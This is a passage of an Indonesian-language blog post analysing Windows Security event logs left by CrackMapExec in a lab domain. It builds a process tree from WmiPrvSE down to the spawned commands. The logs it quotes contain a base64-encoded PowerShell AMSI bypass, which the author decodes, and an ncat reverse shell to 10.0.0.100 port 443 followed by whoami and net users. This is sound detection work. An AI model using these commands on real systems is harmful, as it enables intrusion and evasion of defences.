Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Network Information: 
 Object Type:  File
 Source Address:  127.0.0.1
 Source Port:  56094

Share Information:
 Share Name:  \*C$
 Share Path:  ??C:
 Relative Target Name: WindowsTempkJpSGP

Access Request Information:
 Access Mask:  0x120196
 Accesses:  READ_CONTROL
    SYNCHRONIZE
    WriteData (or AddFile)
    AppendData (or AddSubdirectory or CreatePipeInstance)
    WriteEA
    ReadAttributes
    WriteAttributes

Access Check Results:

Akhirnya, setelah melihat beberapa aktivitas tambahan (yang telah saya kecualikan untuk singkatnya), kami melihat skrip PowerShell dieksekusi oleh proses “cmd.exe”. Harap dicatat, ini bukan “cmd.exe” yang sama dari atas, tetapi aktivitas ini semuanya terkait. Hanya saja “cmd.exe” lain telah dibuat dan saya tidak melihat gunanya kembali untuk menampilkan informasi yang sudah ditunjukkan di atas. Jika Anda memiliki kekhawatiran tentang ini, jangan ragu untuk menghubungi saya.

Saat kita melihat baris perintah di bawah ini, kita melihat apa yang tampaknya menjadi PowerShell yang sedang dieksekusi. Namun, kami tidak dapat membaca isinya saat ini.

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172584
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:

 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xa74
 New Process Name: C:WindowsSystem32cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \127.0.0.1C$WindowsTempRvhXCV 2>&1

Baris perintah di atas tidak perlu dikhawatirkan saat ini. Ini dikodekan base64 dan dengan demikian dapat didekode dengan relatif mudah. Untuk melakukan ini, mari salin string berikut ke dalam file teks.

WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==

Dalam kasus saya, saya menamai file teks “securityNik-b64.encoded”. Sekarang saya memiliki file ini, saya akan memanfaatkan “certutil.exe” pada mesin analisis Windows 10 saya, untuk memecahkan kode teks ini.

c:UsersSecurity Nik>certutil -decode -f c:tmpsecurityNik-b64.encoded c:tmpsecurityNik-b64.decoded
Input Length = 632
Output Length = 472
CertUtil: -decode command completed successfully.

c:UsersSecurity Nik>type c:tmpsecurityNik-b64.decoded
[ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t  V a l i d a t i o n C a l l b a c k   =   { $ t r u e } ;
 t r y {
 [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i  e d ' ,   ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l ,   $ t  u e )
 } c a t c h { }
 g e t - p r o c e s s

Ahhhh! Akhirnya, kita dapat melihat di atas perintah yang dieksekusi. Kami butuh beberapa saat untuk sampai ke sini, tetapi kami berhasil. Tidak perlu khawatir tentang spasi di antara karakter. Ini karena ini adalah nilai Unicode atau 2 byte (16 bit).

Akhirnya kita melihat akun logoff untuk login ID “0xB48AC1”

04/18/2019 01:33:01 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172622
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Logon Type:   3

Barang bagus! Kami memecahkan tantangan itu.

Mari kita beralih ke bagian terakhir dari posting ini. Saat kita melihat bagian terakhir di mana “ncat.exe” dieksekusi, mari kita lihat apa yang bisa kita pelajari dari mereka. Saat kita melewati bagian ini, perhatikan bahwa saya meninggalkan beberapa aktivitas karena mirip dengan apa yang telah kita lihat di atas. Seperti misalnya mengakses share “\*C$” serta membuat dan menghapus file-file sementara seperti “WindowsTempHxuzLk” dan memiliki baris perintah proses seperti “cmd.exe /Q /c cd 1> \127.0.0.1C$WindowsTempHxuzLk 2>&1”. Daripada mengulangi apa yang di atas, mari kita fokus pada item yang lebih relevan.

Kita lihat di bawah yang mirip dengan perintah Powershell, ketika “netcat.exe” dijalankan di bawah, itu

04/18/2019 11:09:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196801
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x426A10

Process Information:
 New Process ID:  0x8a8
 New Process Name: C:WindowsSystem32cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1164
 Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:toolsncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \127.0.0.1C$WindowsTempiKxsfQ 2>&1

Pada titik ini, karena kita memiliki log di atas, lebih baik kita mengambil ID masuk “0x426A10” dan mencari semua aktivitas yang terkait dengannya. Namun, ketika saya melakukan ini, saya tidak menemukan entri log “whoami” dan “pengguna bersih”. Akibatnya, saya harus terus menelusuri catatan saya untuk melihat aktivitas setelah waktu di atas. Saat saya melangkah, saya menyadari ada sejumlah masuk dan keluar yang akan mengakibatkan saya tidak melihat “whoami” di bawah sesi ini karena setiap sesi baru harus menghasilkan ID masuk baru. Namun, semua login ini masih menampilkan karakteristik yang sama dengan akses yang mereka minta dan file yang mereka buat.

Saat saya melangkah melewati batang kayu, saya menyadari bahwa saya mendapatkan jackpot. Mari kita berjalan melalui ini.

Log berikutnya adalah tempat semuanya dimulai. Mari kita bangun pohon kita.

Dari bawah, proses “cmd.exe” dengan PID “0xb94” dibuat oleh proses “WmiPrvSE.exe” dengan PID “0x1bc”. Proses “cmd.exe” memiliki baris perintah yang cukup menarik.

start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)

04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196910
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Process Information:
 New Process ID:  0xb94
 New Process Name: C:WindowsSystem32cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1bc
 Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:toolsncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \127.0.0.1C$WindowsTempvYsGjo 2>&1

Saat kita melihat entri log berikutnya terlihat di bawah bahwa “cmd.exe” dengan PID (0xb94) telah melahirkan “connhost.exe” dengan PID “0xb4”

start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196911
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4
 New Process Name: C:WindowsSystem32conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:WindowsSystem32cmd.exe
 Process Command Line: ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1

Melanjutkan analisis log kami, kami melihat di bawah bahwa proses “cmd.exe” dengan PID “0xb94” sekarang memunculkan “c:toolsncat.exe” dengan PID “0x9e8”. Kita juga dapat melihat “ncat.exe” terhubung ke perangkat di 10.0.0.100 pada port 443. Menarik!

         -> ncat.exe (0x9e8)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196919
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x9e8
 New Process Name: C:Toolsncat.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:WindowsSystem32cmd.exe
 Process Command Line: c:toolsncat.exe  --nodns --exec cmd.exe 10.0.0.100 443 

Selanjutnya kita melihat proses “ncat.exe” dengan PID “0x9e8” memunculkan shell “cmd.exe” dengan PID “0xb4c”.

         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196925
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4c
 New Process Name: C:WindowsSysWOW64cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x9e8
 Creator Process Name: C:Toolsncat.exe
 Process Command Line: cmd.exe

Melihat di bawah, kita sekarang melihat proses “cmd.exe” dengan PID “0xb4c” memunculkan proses bernama “whoami.exe” dengan PID “0xe60”

         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196959
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0
 
Process Information:
 New Process ID:  0xe60
 New Process Name: C:WindowsSysWOW64whoami.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:WindowsSysWOW64cmd.exe
 Process Command Line: whoami

Selanjutnya kita lihat di bawah, proses “cmd.exe” dengan PID “0x4bc” menjalankan proses “net.exe” dengan PID “0x1360” Perhatikan baris perintah untuk ini menjalankan “pengguna bersih”.

                 -> net.exe (0x1360)
               /
         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196966
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x13f0
 New Process Name: C:WindowsSysWOW64net.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:WindowsSysWOW64cmd.exe
 Process Command Line: net  users

Akhirnya, kita melihat proses “net.exe” dengan PID “0x13f0” memunculkan proses “net1.exe” dengan PID “0x570”

                 -> net.exe (0x1360) -> net1.exe (0x570)
               /
         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 

04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196967
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x570
 New Process Name: C:WindowsSysWOW64net1.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x13f0
 Creator Process Name: C:WindowsSysWOW64net.exe
 Process Command Line: C:Windowssystem32net1  users

Baik! Jadi sekarang kami memiliki sejumlah kecerdasan yang masuk akal tentang bagaimana kami dapat menggunakan log kami untuk melihat aktivitas yang dilakukan crackmapexec pada suatu sistem. jelas, Anda harus memiliki tingkat logging yang sesuai untuk dapat memanfaatkan ini secara maksimal.

Lihat sisa posting di bawah ini tentang bagaimana kami melakukan analsis paket mentah dengan memanfaatkan “tshark”, bersama dengan menggunakan alat-alat seperti Snort dan Bro … maaf Zeek.

Referensi:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4661
https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661
https://docs.microsoft.com/en-us/windows/desktop/ADSchema/attributes-all
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/ac2852b7-cbca-4495-8e66-74fa34bcff59
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/a499e86b-daa7-463c-bf3a-f052560b0ccf
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145
https://www.morgantechspace.com/2013/10/Event-ID-5145-Detailed-File-Share-Auditing.html

Postingan dalam seri ini:
Bersenang-senang dengan CrackMapExec
Bersenang-senang dengan CrackMapExec – Analisis Log
Bersenang-senang dengan CrackMapExec – Analisis Paket – CrackMapExec
Bersenang-senang dengan CrackMapExec – Analisis Zeek (Bro)
Bersenang-senang dengan CrackMapExec – Analisis Snort IDS/IPS

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.